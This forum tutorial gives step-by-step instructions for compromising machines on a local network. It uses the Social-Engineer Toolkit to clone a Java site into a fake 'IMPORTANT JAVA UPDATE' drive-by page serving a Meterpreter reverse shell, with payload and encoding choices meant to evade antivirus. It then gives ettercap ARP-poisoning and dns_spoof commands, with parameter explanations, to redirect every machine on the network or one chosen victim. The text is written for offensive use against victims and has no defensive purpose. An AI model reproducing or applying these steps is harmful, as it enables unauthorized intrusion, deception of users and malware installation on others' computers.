How to get into local machines using SET + ETTERCAP
I dontīt know if this is right here in the Expert Section, but I donīt think this fits into General Topics and I canīt directly post into the Howtoīs section.
This Howto describes how you can use SET + ettercap (dns_spoof plugin) together in a good way.
Step 1: Setting up the Fake-Page
a. Start SET
b. Choose Website Attack Attack Vectors by typing 1
c. Choose Java Applet Attack
d. Here choose Custom Import, so you can use this script to clone the site in which you want to inject the DriveBy,
so that you can edit the content of the cloned page before SET makes evil stuff with it :P. I cloned for example www.java.com/en/, and after cloning I edited the index.html with changing the JAVA + YOU, DOWNLOAD TODAY part to sth like IMPORTANT JAVA UPDATE. You dont have to use this option, you can simply use the Site-Cloner from SET, too.
e. After choosing your site, you have to choose the Payload. I recommend choice 2 (Windows Reverse_TCP Meterpreter) in here, or if you know that your target has a 64 bit operating system, choose 5 (Windows Reverse_TCP Meterpreter x64), because the x64 one is completely FUD.
f. Now you have to choose the encryption of the Payload , so that it wont get detected by the victims AV. Just choose 16 (Backdoored Executable), which is currently the best.
g. Yet SET is setting up a Metasploit-Listener, which will show you if someone clicked on your Java DriveBy. You MUST keep this window open.
Step 2: Use ettercap to redirect slave/s to your fake-site
a. The first thing you have to do, is opening the etter.dns file, which is located in /usr/share/ettercap. Just delete everything in it, and if you want to redirect every site your slave visits, write the following into it:
If you only want to redirect one page, write this:
So at my specific case, the etter.dns file looks like this (Everything gets redirected to my fake page):
thesiteyouwanttoredirect A yourip
b. Running ettercap
After configuring everything, you can now run the following command:
This poisons the whole local network, what means, that every PC in your local machine gets redirected to your fake-page.
ettercap -T -q -P dns_spoof -M ARP // //
If you want to redirect only one single PC, you have to run this command:
And here is what the parameters actually mean:
ettercap -T -q -P dns_spoof -M ARP /ipofyourvictim/ //
-T means Text Interface, so you got no annoying GUI
-q means silent mode, ettercap doesnt display everything it does (which were really annoying)
-P means ettercap hast to use the dns_spoof plugin, which is responsible for the redirecting
-M ARP means Man In The Middle Attack, the whole traffic into your network goes first through your PC
So thats it, I hope you like my tutorial, and if you do so, please comment it If you got any questions, feel free to ask me!
Tutorial by Fiddl aka Jodokus